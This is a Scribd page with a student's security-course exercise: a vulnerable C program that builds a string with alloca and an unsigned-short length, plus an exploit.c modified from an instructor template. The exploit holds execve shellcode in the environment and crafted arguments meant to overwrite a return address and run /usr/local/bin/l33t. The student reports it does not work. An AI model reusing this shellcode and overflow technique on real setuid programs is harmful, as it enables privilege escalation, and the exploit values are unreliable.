Scribd Logo
Upload

Welcome to Scribd!

  • Instructions

    Uploaded by

    serverbek0527
    7 views3 pages

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    7 views3 pages

    Instructions

    Uploaded by

    serverbek0527

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    This program is called 6.c and it is stored in the directory /var/challenge/level6.

    #include <alloca.h>
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    static void usage(const char *argv0) {


    printf("Build your own string!\n");
    printf("\n");
    printf("Usage:\n");
    printf(" %s length command...\n", argv0);
    printf("\n");
    printf("Each command consist of a single character followed by it's
    index.\n");
    printf("\n");
    printf("Example:\n");
    printf(" %s 11 h0 e1 l2 l3 o4 w6 o7 r8 l9 d10\n", argv0);
    exit(1);
    }

    int main(int argc, char **argv) {


    char *buffer;
    unsigned short buffersize, i, index, length;

    if (argc < 2) usage(argv[0]);

    length = atoi(argv[1]);
    if (length <= 0) {
    fprintf(stderr, "bad length\n");
    return 1;
    }

    buffersize = length + 1;
    buffer = alloca(buffersize);
    memset(buffer, ' ', buffersize);
    buffer[buffersize - 1] = 0;

    for (i = 2; i < argc; i++) {


    if (strlen(argv[i]) < 2) {
    fprintf(stderr, "bad command \"%s\"\n", argv[i]);
    return 1;
    }

    index = atoi(argv[i] + 1);


    if (index >= length) {
    fprintf(stderr, "bad index in command \"%s\"\n", argv[i]);
    return 1;
    }

    buffer[index] = argv[i][0];
    }

    printf("%s\n", buffer);
    return 0;
    }

    I do not have any write access inside this directory. I want to do an integer
    overflow on this program and inject a shellcode into this program. The shellcode
    should execute a “l33t” command which can be found in the directory
    /usr/local/bin/l33t

    The following is an example exploit.c file that was provided to us by the


    instructors. I can place this file in another directory where I have write access and
    then run this program to do the integer overflow attack. The EIP address where I
    need to do the shellcode injection is BFFFFE43. I have modified the code with
    some values that I think should work.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define VULN "/var/challenge/level6/6" // vulnerable program

    char shellcode[] =
    "\xeb\x15\x5b\x31\xc0\x88\x43\x13\x89\x5b\x14\x89\x43\x18\x8d\x4b\x14"
    "\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/usr/local/bin/l33t";
    // shellcode string ^
    int main() {
    // Define the commandline parameters that VULN expects \xA228 \xFE29
    \xFF30 \xBF31
    char *cmdParam1 = "-1", *cmdParam2= "\xA2 43", *cmdParam3= "\xFE 29",
    *cmdParam4= "\xFF 30", *cmdParam5= "\xBF 31";

    // Define a null-terminated ARGV array for execve()


    char *progWithParameters[] = {VULN, cmdParam1, cmdParam2, cmdParam3,
    cmdParam4, cmdParam5, NULL};

    // Define a null-terminated ENVP (environment) array for execve()


    // This is where we place our shellcode, on the environment
    char *envp[] = {shellcode, NULL};

    // invoke execve(prog, progWithParameters, envp)


    execve(progWithParameters[0], progWithParameters, envp);

    return 0;
    }

    However, this is currently not working, need someone to


    help out.

    You might also like